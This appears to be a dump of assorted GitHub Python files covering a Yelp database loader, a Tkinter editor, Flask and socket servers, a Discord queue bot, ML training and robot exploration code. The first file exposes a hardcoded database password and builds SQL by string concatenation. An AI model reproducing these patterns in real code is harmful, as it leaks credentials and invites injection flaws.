password='oiAv4Kmdup8Pd4vd'\")\nexcept:\n print('Unable to connect to the database!')\n\ncur = conn.cursor()\n\nstartingTime = time.process_time()\nwith open('./yelp_user.JSON','r') as f: \n #outfile = open('./yelp_business.SQL', 'w') #uncomment this line if you are writing the INSERT statements to an output file.\n line = f.readline()\n count_line = 0\n\n while line:\n data = json.loads(line) \n\n user_id = str(data['user_id'])\n\n sql_str = \"INSERT INTO Friend (user_id, friend_id) \" \\\n \"VALUES ('\" + cleanStr4SQL(user_id) + \"','\"\n\n for k, v in data.items():\n if k == \"friends\":\n # do something for each v in friends\n temp_friends = v\n\n for friend in temp_friends:\n sql_str = sql_str + cleanStr4SQL(friend) + \"');\"\t\t\t\t\t\n sql_str = \"INSERT INTO Friend (user_id, friend_id) \" \\\n \"VALUES ('\" + cleanStr4SQL(user_id) + \"','\"\n try:\n cur.execute(sql_str)\n except Exception as e:\n print(\"Insert failed! \" + str(e) + \"\\nOn line: \" + str(count_line))\n \n conn.commit()\n line = f.readline()\n count_line +=1\n\nprint(\"Processed \" + str(count_line) + \" Entries in \" + str(time.process_time() - startingTime) + \" seconds\")\n\nf.close()\ncur.close()\nconn.close()","repo_name":"JoshuaRBennett/Yelp-Database-Project","sub_path":"Database/insertFriend.py","file_name":"insertFriend.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41354371879","text":"import tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter import font\r\nfrom tkcode import CodeEditor\r\n\r\nlogo = '''\r\n _ _ _ _ _ _ _ ____ ___ _ ___ ____ ____ \r\n |__| | | | |_/ |___ | \\ | | | | |__/ \r\n | | |__| |___ | \\_ |___ |__/ | | |__| | \\ \r\n \r\n coded by R3DHULK \r\n'''\r\nprint(logo)\r\ncode=input(\"Enter file name : \")\r\n\r\nhulk = tk.Tk()\r\nhulk.title(\"Hulk Editor\")\r\nhulk.option_add(\"*tearOff\", 0)\r\n\r\n\r\nnotebook = ttk.Notebook(hulk)\r\ntab_1 = ttk.Frame(notebook)\r\nnotebook.add(tab_1, text=code+input('write extension : '))\r\nnotebook.pack(fill=\"both\", expand=True)\r\n\r\ncode_editor = CodeEditor(\r\n tab_1,\r\n width=99,\r\n height=30,\r\n language=\"python\",\r\n background=\"black\",\r\n highlighter=\"dracula\",\r\n font=\"Consolas\",\r\n autofocus=True,\r\n blockcursor=True,\r\n insertofftime=0,\r\n padx=10,\r\n pady=10,\r\n \r\n)\r\ncode_editor.pack(fill=\"both\", expand=True)\r\ncode_editor.content = input(\"write here : \")\r\nhulk.update()\r\nhulk.minsize(hulk.winfo_width(), hulk.winfo_height())\r\nhulk.mainloop()","repo_name":"R3DHULK/r3dhulk-s-code_editor","sub_path":"hulk-editor.py","file_name":"hulk-editor.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"18574564176","text":"#!/usr/bin/python\n\nimport socket\n\nhost='0.0.0.0'\nport=12345\n\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.bind((host,port))\ns.listen(1)\n\nwhile True:\n\tclientsock,clientaddr = s.accept()\n\tprint(\"got connect from: \", clientsock.getpeername())\n\n","repo_name":"AkioLove/Talk","sub_path":"socket-talk/server-restart-test/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33571306199","text":"from flask import Flask, request\nfrom flask_restful import Resource, Api\n\napp = Flask(__name__)\napi = Api(app)\n\nclass Triple_test(Resource):\n def post(self):\n return 'returned content: <{}>'.format(str(request.data.decode('utf-8')))\n\nclass Word_count_test(Resource):\n def post(self):\n data = str(request.data.decode('utf-8'))\n print(f'Received data: <{data}>')\n return 'Received word_count OK'\n\napi.add_resource(Triple_test, '/update') # Endpoint\napi.add_resource(Word_count_test, '/wordCountData')\n\n\nif __name__ == '__main__':\n app.run(port='53253')","repo_name":"Knox-AAU/OBSOLETE_KnowledgeLayer_Nordjyske","sub_path":"rest/LocalTestAPI.py","file_name":"LocalTestAPI.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14338395307","text":"#!/usr/bin/env python\nimport csv\nimport time\n\ndef read_csv_data(file_path):\n timestamp = []\n long_deg = []\n long_min = []\n long_sec = []\n with open(file_path) as csv_file:\n csv_reader = csv.reader(csv_file,delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count==0 :\n print('Reading name of columns')\n for i in range(len(row)):\n print(row[i],i)\n line_count+=1\n continue\n timestamp.append(row[0])\n long_deg.append(row[4])\n long_min.append(row[5])\n long_sec.append(row[6])\n line_count+=1\n long_deg = [int(_) for _ in long_deg]\n long_min = [int(_) for _ in long_min]\n long_sec = [float(_) for _ in long_sec]\n\n return timestamp,long_deg,long_min,long_sec\n\ndef timestamp_to_time(t):\n time_values = []\n for _ in t:\n tempTimeObject = time.strptime(_,\"%d/%m/%Y-%H:%M:%S:%f\")\n time_values.append(tempTimeObject.tm_hour*3600+tempTimeObject.tm_min*60+tempTimeObject.tm_sec)\n time0 = time_values[0]\n time_values = [t-time0 for t in time_values]\n return time_values\n\ndef equivalentLongitude(degs,mins,secs):\n eqLat = []\n for i in range(len(degs)):\n eqLat.append(degs[i]+mins[i]/60+secs[i]/60) #forse da modificare\n return eqLat\n\ndef computeOrbitTime(time,longitude):\n i=0\n startTime = -1\n ib = 0\n endTime = -1\n ie = 0\n #for i in range(len(longitude)):\n while i < len(longitude):\n if longitude[i] < -170:\n print(longitude[i])\n\n if startTime < 0:\n startTime = time[i]\n ib = i\n i+=20\n else:\n endTime = time[i]\n ie = i\n i+=20\n i+=1\n return endTime - startTime, ib,ie\n \n\ndef main():\n timestamp,latDeg,latMin,latSec = read_csv_data('../zz_astrolorenzini/zz_astrolorenzini_data.csv') #print(latDeg,latMin,latSec)\n time_values = timestamp_to_time(timestamp)\n eqLongitude = equivalentLongitude(latDeg,latMin,latSec)\n orbitTime,ib,ie = computeOrbitTime(time_values, eqLongitude)\n print(\"Il tempo di orbita è di {} secondi. {},{}\".format(orbitTime,ib,ie))\n\n\nmain()","repo_name":"LucaPalumbo/AstroLorenzini","sub_path":"computeOrbitTime/computeTimeUsingLatLon.py","file_name":"computeTimeUsingLatLon.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21671631119","text":"import datetime\nimport json\nfrom pprint import pp\nimport sys\nimport time\nimport discord\nimport pytz\nfrom classes.player import Player\nfrom classes.role import Role, top, jungle, middle, bottom, support, fill\n\nfrom utils.is_player_gold_plus import is_player_gold_plus\n\nclass LeftQueue(discord.ui.View):\n def __init__(self, queue):\n super().__init__()\n self.queue = queue\n \n @discord.ui.button(label=\"Queue again\", style=discord.ButtonStyle.green)\n async def queue_again_button_callback(self, interaction: discord.Interaction, button: discord.ui.Button):\n with open('C:\\\\DATA\\\\unlq.json', 'r') as file:\n unlq = json.load(file)\n if str(interaction.user.id) in unlq['players']:\n if interaction.user.id not in self.queue.get_all_ids() and str(interaction.user.id) not in unlq['in_queue'].keys():\n if unlq['players'][str(interaction.user.id)]['banned_until'] < time.time():\n if await is_player_gold_plus(unlq['players'][str(interaction.user.id)]['id']) or interaction.user.id in [301821822502961152, 300052305540153354, 178867201753743360]:\n #if True:\n if interaction.user.id not in self.queue.get_all_ids() and str(interaction.user.id) not in unlq['in_queue'].keys():\n if len(self.queue.players) == 9 and interaction.user.id not in self.queue.get_all_ids():\n await interaction.response.edit_message(content=\"Game is about to begin...\", view=None)\n if self.queue.spots_open > 0:\n for p in unlq['players'].keys():\n if p == str(interaction.user.id):\n ign = unlq['players'][p]['name']\n rating = int(unlq['players'][p]['rating'] + (unlq['players'][p]['mmr'] / 1000*20))\n if unlq['players'][p]['role1'] != \"\" and unlq['players'][p]['role2'] != \"\":\n role1 = getattr(sys.modules[__name__], unlq['players'][p]['role1'].lower())\n role2 = getattr(sys.modules[__name__], unlq['players'][p]['role2'].lower())\n player = Player(interaction.user.id, interaction.user.name, role1, interaction.user, False, ign, rating, role2=role2)\n await self.queue.add_player(player)\n if self.queue.full != True:\n view = MatchmakingView(self.queue)\n await interaction.response.edit_message(view=view, content=f\"*You can dismiss this window, you will be mentioned once a match has been found.\\nIf you want to bring this window up again after closing it, enter the /queue command again.*\\n**You are in queue...**\\n**`{player.ign}`**\\n**{role1.name} {role1.emoji}**\")\n else:\n await interaction.response.edit_message(content=\"Lobby is already full.\", view=None)\n else:\n await interaction.response.edit_message(content=\"You are already in queue.\", view=None)\n else:\n await interaction.response.edit_message(f\"You need to be ranked Gold 4 or above in Ranked Solo/Duo to play Champions Queue.\")\n else:\n banned_until = unlq['players'][str(interaction.user.id)]['banned_until']\n value = datetime.datetime.fromtimestamp(banned_until, pytz.timezone('Europe/London'))\n res = value.strftime('%d %B %I:%M %p')\n await interaction.response.edit_message(f\"You are restricted from playing Champions Queue until {res} UK time.\")\n else:\n for p in unlq['players'].keys():\n if p == str(interaction.user.id):\n ign = unlq['players'][p]['name']\n rating = int(unlq['players'][p]['rating'] + (unlq['players'][p]['mmr'] / 1000*20))\n role = getattr(sys.modules[__name__], unlq['players'][p]['role1'].lower())\n player = Player(interaction.user.id, interaction.user.name, role, interaction.user, False, ign, rating)\n await interaction.response.edit_message(view=MatchmakingView(self.queue), content=f\"*You can dismiss this window, you will be mentioned once a match has been found.\\nIf you want to bring this window up again after closing it, enter the /queue command again.*\\n**You are in queue...**\\n**`{player.ign}`**\\n**{role.name} {role.emoji}**\")\n else:\n await interaction.response.edit_message(\"You need to link an account first! Try using **/link**\")\n\nclass MatchmakingView(discord.ui.View):\n def __init__(self, queue):\n super().__init__(timeout=None)\n self.queue = queue\n\n @discord.ui.button(label=\"Matchmaking...\", style=discord.ButtonStyle.gray, emoji=\"\", disabled=True)\n async def matchmaking_callback(self, interaction: discord.Interaction, button: discord.ui.Button):\n pass\n\n @discord.ui.button(label=\"Leave queue\", style = discord.ButtonStyle.red)\n async def leavequeue_button_callback(self, interaction: discord.Interaction, button: discord.ui.Button):\n with open('C:\\\\DATA\\\\unlq.json', 'r') as file:\n unlq = json.load(file)\n if str(interaction.user.id) in unlq['in_queue'].keys():\n del unlq['in_queue'][str(interaction.user.id)]\n with open('C:\\\\DATA\\\\unlq.json', 'w') as unlq_file:\n json.dump(unlq, unlq_file)\n if self.queue.locked != True:\n list = self.queue.players\n for player in list:\n if interaction.user.id == player.user.id:\n print(player.name + \" left the queue\")\n self.queue.players.remove(player)\n await self.queue.update_lobby()\n await interaction.response.edit_message(content='You left the queue.', view=LeftQueue(self.queue))","repo_name":"beddomu/unl-queue","sub_path":"classes/views/matchmaking.py","file_name":"matchmaking.py","file_ext":"py","file_size_in_byte":6443,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"28019894022","text":"class Solution:\n def stoneGameIII(self, vals: List[int]) -> str:\n n = len(vals)\n bob = total = sum(vals)\n tail = []\n for i in range(n):\n tail.append(total)\n total -= vals[i]\n tail.append(0)\n tail.append(0)\n tail.append(0)\n @cache\n def strategy(i):\n ret = -9999999999\n if i >= n:\n return 0\n for a in range(i+1, i+4):\n ret = max(ret, tail[i] - strategy(a))\n return ret\n alice = strategy(0)\n bob -= alice\n if alice > bob:\n return \"Alice\"\n elif bob > alice:\n return \"Bob\"\n return \"Tie\"\n","repo_name":"balwierz/LeetCode","sub_path":"1406 Stone Game III.py","file_name":"1406 Stone Game III.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15230907809","text":"import pyttsx3\n\n# Set up the text-to-speech engine\nengine = pyttsx3.init()\n\n# Set the voice properties\nvoices = engine.getProperty('voices')\ncounter = 1\nfor i, v in enumerate(voices):\n text = \"Why did the tomato turn red? Because it saw the salad dressing!\"\n engine.setProperty('rate', 160)\n engine.setProperty('pitch', 80)\n engine.setProperty('voice', voices[i].id)\n engine.say(f\"I am Voice Number {' '}{counter}\")\n engine.say(text)\n counter += 1\n\nif __name__ == \"__main__\":\n engine.runAndWait()\n\n\n\n\n\n","repo_name":"stepheweffie/Youtube_Automation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19537186150","text":"import torch\nfrom torch import nn\nfrom torchvision import transforms\nimport torchvision.datasets as dsets\nfrom torch.utils.data import Dataset, DataLoader\n\n\ndatapath = \"/home/xuren\"\ntrain_data = dsets.MNIST(datapath, download=True, train=True, transform=transforms.ToTensor())\nprint(train_data)\n\nvalid_data = dsets.MNIST(datapath, download=True, train=False, transform=transforms.ToTensor())\nprint(valid_data)\n\nclass Net(nn.Module):\n def __init__(self, input_size, hidden_size, output_size):\n super(Net, self).__init__()\n self.linear1 = nn.Linear(input_size, hidden_size)\n self.linear2 = nn.Linear(hidden_size, output_size)\n\n def forward(self, x):\n yhat = torch.sigmoid(self.linear1(x))\n yhat = torch.sigmoid(self.linear2(yhat))\n return yhat\n\n\nmodel = Net(28*28, 128, 10)\ntrainloader = DataLoader(train_data, batch_size=32)\nvalidloader = DataLoader(valid_data, batch_size=32)\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n\nfor e in range(2):\n for x,y in trainloader:\n yhat = model(x.view(-1, 28*28))\n loss = criterion(yhat, y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n print(loss)\n\n # eval\n print()\n print(\"evaluating...\")\n correct = 0\n for x_test, y_test in validloader:\n yhat = model(x_test.view(-1, 28*28))\n values, indices = torch.max(yhat.data, 1)\n # print((indices == y_test).sum().item())\n correct += (indices == y_test).sum().item()\n print(correct / 10000)\n\n","repo_name":"xr71/ibm-ai-engineering","sub_path":"p4_deep_nn_pytorch/07_01_fc_neural_networks_pytorch.py","file_name":"07_01_fc_neural_networks_pytorch.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9231701994","text":"import boto3\n\npolly_client = boto3.Session(\n profile_name=\"myown\",\n # aws_access_key_id=,\n # aws_secret_access_key=,\n region_name='eu-west-3').client('polly')\n\ndata = 'あい'\n\nresponse = polly_client.synthesize_speech(\n VoiceId='Mizuki',\n OutputFormat='mp3',\n Text=data,\n)\n\nwith open('speech.mp3', 'wb') as fp:\n fp.write(response['AudioStream'].read())\n","repo_name":"multani/anki-japanese-addon","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3286949946","text":"from kivy.lang import Builder \nfrom kivymd.app import MDApp \n\nkv = '''\n:\n group: 'group'\n size_hint: None, None \nMDFloatLayout:\n Check:\n active : True\n pos_hint:{'center_x': 0.5, 'center_y': 0.5}\n \n'''\nclass demo(MDApp):\n def build(self):\n return Builder.load_string(kv)\ndemo().run();\n","repo_name":"Gowrishankar-atmega-robotics/kivy","sub_path":"06.Input/selection/01.checkbox.py","file_name":"01.checkbox.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18774242882","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar 14 15:08:28 2023\r\n\r\n@author: Administrator\r\n\"\"\"\r\n\r\nfrom flask import Flask, render_template\r\nfrom flask_socketio import SocketIO, emit\r\n\r\n \r\napp = Flask(__name__)\r\napp.config['SECRET_KEY'] = 'secret_key'\r\n \r\nsocketio = SocketIO()\r\nsocketio.init_app(app, cors_allowed_origins='*')\r\n \r\nname_space = '/dcenter'\r\n \r\n@app.route('/')\r\ndef index():\r\n \r\n return render_template('index.html')\r\n \r\n\r\n@app.route('/push')\r\ndef push_once():\r\n event_name = 'dcenter'\r\n broadcasted_data = {'data': \"test message!\"}\r\n socketio.emit(event_name, broadcasted_data, broadcast=False, namespace=name_space)\r\n # print('test message!')\r\n return 'done!'\r\n \r\n \r\n# @socketio.on('connect', namespace=name_space)\r\n# def connected_msg():\r\n# print('client connected.')\r\n \r\n \r\n# @socketio.on('disconnect', namespace=name_space)\r\n# def disconnect_msg():\r\n# print('client disconnected.')\r\n \r\n \r\n# @socketio.on('my_event', namespace=name_space)\r\n# def mtest_message(message):\r\n# print(message)\r\n# emit('my_response',\r\n# {'data': message['data'], 'count': 1})\r\n \r\n \r\nif __name__ == '__main__':\r\n socketio.run(app,port=5001)\r\n # socketio.run(host=\"10.0.20.6\", port=5000, debug=True)\r\n # app.run(host=\"10.0.20.6\", port=5000, debug=True)\r\n # ,allow_unsafe_werkzeug=True\r\n\r\n\r\n\r\n#%%%%%%%%%%%%%%%%%%%%%%%%%%%\r\n\r\nimport datetime\r\nimport time\r\nimport requests\r\n\r\nwhile True: \r\n # if time.localtime().tm_hour == 8: # 运行定时任务 \r\n if time.localtime().tm_sec == 0:\r\n re = requests.get(url='https://v1.hitokoto.cn/?encode=text')\r\n print(re.text)\r\n # now = datetime.datetime.now().isoformat()\r\n # print(now)\r\n time.sleep(1)\r\n \r\n\r\n\r\n\r\n'''\r\n\r\n\r\n\r\n#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\r\n\r\nfrom flask import Flask, render_template\r\nfrom flask_socketio import SocketIO\r\nfrom flask_socketio import send, emit\r\n\r\napp = Flask(__name__)\r\napp.config['SECRET_KEY'] = 'secret!'\r\nsocketio = SocketIO(app)\r\n\r\n\r\n# # 未命名事件\r\n# @socketio.on('message')\r\n# def handle_message(message):\r\n# print('received message: ' + message)\r\n\r\n# # 自定义命名事件\r\n# @socketio.on('my_event')\r\n# def handle_message(p1, p2): # 形参\r\n# print('received message: ', p1, p2)\r\n\r\n# # 命名空间namespace,它允许客户端在同一个物理套接字上复用几个独立的连接\r\n# @socketio.on('my_event', namespace='/test')\r\n# def handle_my_custom_namespace_event(p):\r\n# print('received: ' + str(p))\r\n\r\n# # 返回值给客户端\r\n# def handle_message(p): # 形参\r\n# print(p)\r\n# return 123 # 客户端将收到这个返回值\r\n\r\n# #########################################################\r\n# # on_event方法,效果等同于装饰器\r\n# def my_function_handler(data):\r\n# pass\r\n\r\n# socketio.on_event('my event', my_function_handler, namespace='/test')\r\n\r\n\r\n# @socketio.on('event1')\r\n# def handle_event1(p):\r\n# send('hello world')\r\n\r\n# @socketio.on('event2')\r\n# def handle_event2(p):\r\n# emit('event2 response', 'hi world') # event2 response为该事件的命名\r\n\r\n# # namespace\r\n# @socketio.on('event3')\r\n# def handle_event3():\r\n# emit('event3 response', '333', namespace='/chat')\r\n\r\n# # 多个值用元祖的形式\r\n# @socketio.on('event4')\r\n# def handle_event4():\r\n# emit('event4 response', ('4', '44', '444'), namespace='/chat')\r\n\r\n# # 回调函数\r\n# def ack():\r\n# print ('message was received!')\r\n\r\n# @socketio.on('event5')\r\n# def handle_event5():\r\n# emit('event5 response', '555', callback=ack)\r\n# # 当使用回调函数时,客户端接收到一个回调函数来接收消息。 客户端应用程序调用回调函数后,调用相应的服务器端回调。 \r\n# # 如果用参数调用客户端回调,则这些回调也作为参数提供给服务器端回调。\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n socketio.run(app,allow_unsafe_werkzeug=True)\r\n # ,allow_unsafe_werkzeug=True\r\n# socketio.run()函数封装了Web服务器的启动,代替了app.run()标准的Flask开发服务器启动。 \r\n# 当应用程序处于调试模式时,Werkzeug开发服务器仍在socketio.run()中使用和正确配置。 \r\n# 在生产模式下首选使用eventlet Web服务器,否则使用gevent Web服务器。 \r\n# 如果没有安装eventlet和gevent,则使用Werkzeug开发Web服务器。\r\n\r\n\r\n#%%%%%%%%%%%%%%%%%%%\r\n\r\n\r\nfrom flask_socketio import Namespace, emit\r\n\r\nclass MyCustomNamespace(Namespace):\r\n def on_connect(self):\r\n pass\r\n\r\n def on_disconnect(self):\r\n pass\r\n\r\n def on_my_event(self, data):\r\n emit('my_response', data)\r\n\r\nsocketio.on_namespace(MyCustomNamespace('/test'))\r\n\r\nif __name__ == '__main__':\r\n socketio.run(app,allow_unsafe_werkzeug=True)\r\n'''","repo_name":"Camydb/FirstRepository","sub_path":"Flask_socketIO.py","file_name":"Flask_socketIO.py","file_ext":"py","file_size_in_byte":4791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37927532640","text":"T = int(input()) \n\n# 가위 : 1\n# ���위 : 2\n# 보 : 3\n\ndef divideconquer(start, end):\n m = (start+end) // 2\n if start == end:\n return start\n left = divideconquer(start, m)\n right = divideconquer(m+1, end)\n\n return RSP(left, right)\ndef RSP(left, right):\n if (card[left] == 1 and card[right]==3):\n return left\n elif (card[left]== 2 and card[right] == 1):\n return left\n elif (card[left]== 3 and card[right] == 2):\n return left\n elif (card[left]==card[right]):\n return left\n else:\n return right\nfor test_case in range(1, T+1):\n end = int(input())\n start = 0\n end = end - 1\n card = list(map(int, input().split()))\n\n print(\"#{} {}\".format(test_case, divideconquer(start, end)+1))\n","repo_name":"JeongMin-98/algorithm","sub_path":".vscode/stack2/[4880]tournament_cardgame.py","file_name":"[4880]tournament_cardgame.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39417717141","text":"import socket\nimport shared_lib.message as msg\n\nfrom shared_lib.LocalFile import LocalFile\nfrom shared_lib.file import send_file_download_message, \\\n establish_file_directory, read_upload_response_message, \\\n send_confirmation_message_to_upload_request, download_file, \\\n string_to_file, send_file_from_local_to_remote\n\n\nclass DistributedFile(LocalFile):\n def __init__(self, file_handle, file_name, abs_path, bytes_size,\n file_server_socket):\n LocalFile.__init__(self, file_handle, file_name, abs_path, bytes_size)\n self.file_server_socket = file_server_socket\n\n def close(self):\n send_file_from_local_to_remote(self, self.file_server_socket)\n self.file_server_socket.close()\n\n def final_close(self):\n return self.file_handle.close()\n\n @staticmethod\n def open(file_id, abs_directory_path, directory_socket):\n \"\"\"\n Read file from file server\n :param abs_directory_path: Path to where file will be stored\n :param file_id: Unique string for file\n :param directory_socket: Socket connection with file server\n :return: a handle to the file\n \"\"\"\n file_server_message = establish_file_directory(file_id,\n directory_socket)\n\n host = file_server_message.host\n port = file_server_message.port\n\n file_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n file_socket.connect((host, port))\n\n send_file_download_message(file_id, file_socket)\n\n response = read_upload_response_message(file_id, file_socket)\n\n file_name = response.file_name\n\n assert file_id == file_name\n\n file_size = response.file_size\n\n send_confirmation_message_to_upload_request(file_name, file_size,\n file_socket)\n\n file_contents = download_file(file_name, file_size, file_socket)\n\n f = string_to_file(file_name, abs_directory_path, file_contents)\n\n return DistributedFile(f, file_id, f.name, file_size, file_socket)\n","repo_name":"chooie/distributed-systems-cs4032","sub_path":"distributed-file-server/server_client_package/shared_lib/DistributedFile.py","file_name":"DistributedFile.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2041880844","text":"from django_filters import rest_framework as filters\n\nfrom .choices import CourseChoices, CourseFormatChoices, CourseTypeChoices, StatusChoices\n\n\nclass OrderFilter(filters.FilterSet):\n name_contains = filters.CharFilter('name', 'icontains')\n surname_contains = filters.CharFilter('surname', 'icontains')\n email_contains = filters.CharFilter('email', 'icontains')\n phone_contains = filters.NumberFilter('phone', 'icontains')\n age_in = filters.BaseInFilter('age')\n course = filters.ChoiceFilter('course', choices=CourseChoices.choices)\n course_format = filters.ChoiceFilter('course_format', choices=CourseFormatChoices.choices)\n course_type = filters.ChoiceFilter('course_type', choices=CourseTypeChoices.choices)\n status_in = filters.ChoiceFilter('status', choices=StatusChoices.choices)\n group = filters.CharFilter('group__id', 'icontains')\n created_at = filters.DateFromToRangeFilter()\n manager = filters.CharFilter('manager__name', 'icontains')\n order_by = filters.OrderingFilter(\n fields=(\n 'id',\n 'name',\n 'surname',\n 'email',\n 'phone',\n 'age',\n 'course',\n 'course_format',\n 'course_type',\n 'status',\n 'sum',\n 'already_paid',\n 'created_at',\n 'updated_at',\n 'group',\n 'manager',\n )\n )\n","repo_name":"ostapichev/orders_backend","sub_path":"apps/orders/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72056025445","text":"import os\nimport pandas as pd\nimport numpy as np\nimport json\nimport csv\nfrom collections import defaultdict\nfrom sklearn.model_selection import train_test_split\nfrom copy import deepcopy\n\nfrom utils import create_annotation_split, create_annotator_split\n\n\nDATASET_NAME = \"toxic-ratings\"\nTASK = \"toxic_score\"\n\nannotator_data = defaultdict(list)\nannotation_labels = set()\nstats = defaultdict(int)\nidx = 0\nwith open(f'raw-{DATASET_NAME}/toxicity_ratings.json', 'r') as f:\n lines = f.readlines()\nfor uid, line in enumerate(lines):\n data = json.loads(line)\n # process each row differently this time\n item_dict = {}\n item_dict[\"uid\"] = uid\n ratings = data[\"ratings\"]\n for rating in ratings:\n item_dict[\"id\"] = idx\n item_dict[\"respondent_id\"] = rating[\"worker_id\"]\n item_dict[TASK] = str(rating[\"toxic_score\"])\n annotation_labels.add(str(rating[\"toxic_score\"]))\n item_dict[\"sentence\"] = data[\"comment\"]\n annotator_data[rating[\"worker_id\"]].append(deepcopy(item_dict))\n stats[rating[\"worker_id\"]] += 1\n idx += 1\n\ncreate_annotation_split(DATASET_NAME, annotator_data, TASK)\ncreate_annotator_split(DATASET_NAME, annotator_data, TASK)\n\n\nwith open(f\"{DATASET_NAME}-processed/annotation_labels.json\", 'w') as f:\n json.dump(list(annotation_labels), f, indent=4)\n\nwith open(f\"{DATASET_NAME}-processed/stats.json\", 'w') as f:\n json.dump(stats, f, indent=4)\n\n","repo_name":"MichiganNLP/Annotator-Embeddings","sub_path":"src/example-data/process_toxicity_ratings.py","file_name":"process_toxicity_ratings.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"36000634441","text":"import math\nimport random\n\nfrom einops import asnumpy\nimport numpy as np\nimport torch\n\nfrom cos_eor.explore.frontier_agent import FrontierAgent\nfrom cos_eor.explore.utils.geometry import process_odometer, compute_egocentric_coors\n\nimport cos_eor.explore.sensors\nimport cos_eor.explore.sim\n\nclass ExploreModule:\n def __init__(self, params, num_envs):\n self.params = params\n actions = [\"STOP\", \"MOVE_FORWARD\", \"TURN_LEFT\", \"TURN_RIGHT\", \"LOOK_UP\", \"LOOK_DOWN\", \"GRAB_RELEASE\"]\n self.action_mapping = {action: idx for idx, action in enumerate(actions)}\n self.num_envs = num_envs\n\n large_map_range = 100.0\n self.occ_map_scale = 0.1 * (2 * large_map_range + 1) / params.highres_occ_map_size\n self.frontier_agent = FrontierAgent(\n {\"forward\": 1, \"left\": 2, \"right\": 3, \"stop\": 0},\n \"habitat\",\n self.occ_map_scale,\n show_animation=False,\n dilate_occupancy=True,\n max_time_per_target=30,\n )\n self.obs_odometer = torch.zeros(num_envs, 4)\n self.delta_ego = torch.zeros(num_envs, 4)\n self.seen_area = torch.zeros(num_envs)\n self._steps_since_new_area = torch.zeros(num_envs)\n\n def to(self, device):\n self.obs_odometer = self.obs_odometer.to(device)\n self.delta_ego = self.delta_ego.to(device)\n self.seen_area = self.seen_area.to(device)\n self._steps_since_new_area = self._steps_since_new_area.to(device)\n\n def reset(self):\n self.obs_odometer.fill_(0)\n self.delta_ego.fill_(0)\n self.seen_area.fill_(0)\n self._steps_since_new_area.fill_(0)\n\n @property\n def steps_since_new_area(self):\n return self._steps_since_new_area[0].item()\n\n def reset_steps_since_new_area(self):\n self._steps_since_new_area.fill_(0)\n\n def update(self, obs):\n \"\"\"this is called every single step\"\"\"\n batch_size = self.delta_ego.shape[0]\n\n for i in range(batch_size):\n seen_area = obs[\"seen_area\"][i][0]\n if math.isclose(self.seen_area[i], seen_area):\n self._steps_since_new_area[i] += 1\n else:\n self.seen_area[i] = seen_area\n self._steps_since_new_area[i] = 0\n\n if self.params.name == \"frontier\":\n obs_odometer_curr = process_odometer(obs[\"delta\"])\n self.delta_ego = compute_egocentric_coors(\n obs_odometer_curr,\n self.obs_odometer,\n self.occ_map_scale\n )\n for i in range(batch_size):\n if obs[\"new_episode\"][i] == 1:\n self.obs_odometer[i] = obs_odometer_curr[i]\n else:\n self.obs_odometer[i] += obs_odometer_curr[i]\n\n def _act_forward_right(self, obs):\n if obs[\"cos_eor\"][0][\"is_collided\"]:\n action = self.action_mapping[\"TURN_RIGHT\"]\n else:\n action = self.action_mapping[\"MOVE_FORWARD\"]\n return action\n\n def _act_frontier(self, obs):\n occ_map = asnumpy(obs[\"coarse_occupancy\"].cpu()).astype(np.uint8)\n collision = asnumpy(obs[\"collision\"].cpu())\n delta_ego = asnumpy(self.delta_ego.cpu())\n batch_size = occ_map.shape[0]\n action = np.zeros(batch_size, dtype=int)\n for i in range(batch_size):\n action[i] = self.frontier_agent.act(occ_map[i], delta_ego[i], collision[i][0])\n return action[0]\n\n def act(self, obs):\n \"\"\"this is called only when the exploration module takes 